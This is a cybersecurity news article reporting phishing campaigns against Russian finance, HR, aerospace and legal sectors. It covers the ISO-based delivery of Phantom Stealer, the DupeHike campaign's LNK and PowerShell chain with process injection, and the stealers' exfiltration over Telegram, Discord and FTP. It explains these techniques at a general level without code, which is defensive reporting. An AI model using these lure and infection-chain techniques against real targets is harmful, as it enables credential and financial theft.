Cybersecurity researchers have revealed an active phishing campaign targeting various sectors in Russia using malicious ISO optical disc images to deliver Phantom Stealer.
The operation, named MoneyMount-ISO by Seqrite Labs, primarily focuses on finance and accounting entities. Secondary targets include procurement, legal, and payroll departments.
The campaign uses fake payment confirmation lures to deliver the information-stealing malware through a multi-stage attachment chain.
The infection process starts with a phishing email disguised as a financial communication. It urges the recipient to confirm a bank transfer. Attached is a ZIP archive containing an ISO file that mounts as a virtual CD drive when opened. This ISO image acts as an executable that launches Phantom Stealer using an embedded DLL named CreativeAI.dll.
Phantom Stealer is designed to extract data from cryptocurrency wallet browser extensions and desktop apps. It can also steal files, Discord authentication tokens, and browser-related passwords, cookies, and credit card details. The malware monitors clipboard content and logs keystrokes while performing checks to detect virtual or analysis environments. If it detects such an environment, it stops running. Stolen data is sent to attackers via a Telegram bot, a Discord webhook, or an FTP server.
In recent months, Russian organizations have also faced another campaign called DupeHike, attributed to the threat group UNG0902. This campaign targets human resources and payroll departments with lures related to bonuses or internal policies. It uses a ZIP file containing PDF and LNK decoys to download an implant called DUPERUNNER, which then executes the AdaptixC2 command-and-control framework. The LNK file uses PowerShell to download the implant, which displays a decoy PDF while injecting the malicious C2 beacon into legitimate Windows processes like explorer.exe or notepad.exe.
Other phishing efforts have targeted the Russian aerospace, legal, and finance sectors to distribute tools like Cobalt Strike, Formbook, and DarkWatchman. These tools allow for data theft and remote control of infected systems. Attackers often use the email servers of compromised Russian companies to send these phishing messages.
The French cybersecurity firm Intrinsec has linked some of these intrusions to hacktivists aligned with Ukrainian interests. These campaigns, detected between June and September 2025, aim to compromise entities cooperating with the Russian military. Some of these attacks redirect users to phishing login pages designed to steal credentials for Microsoft Outlook and the aerospace company Bureau 1440.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
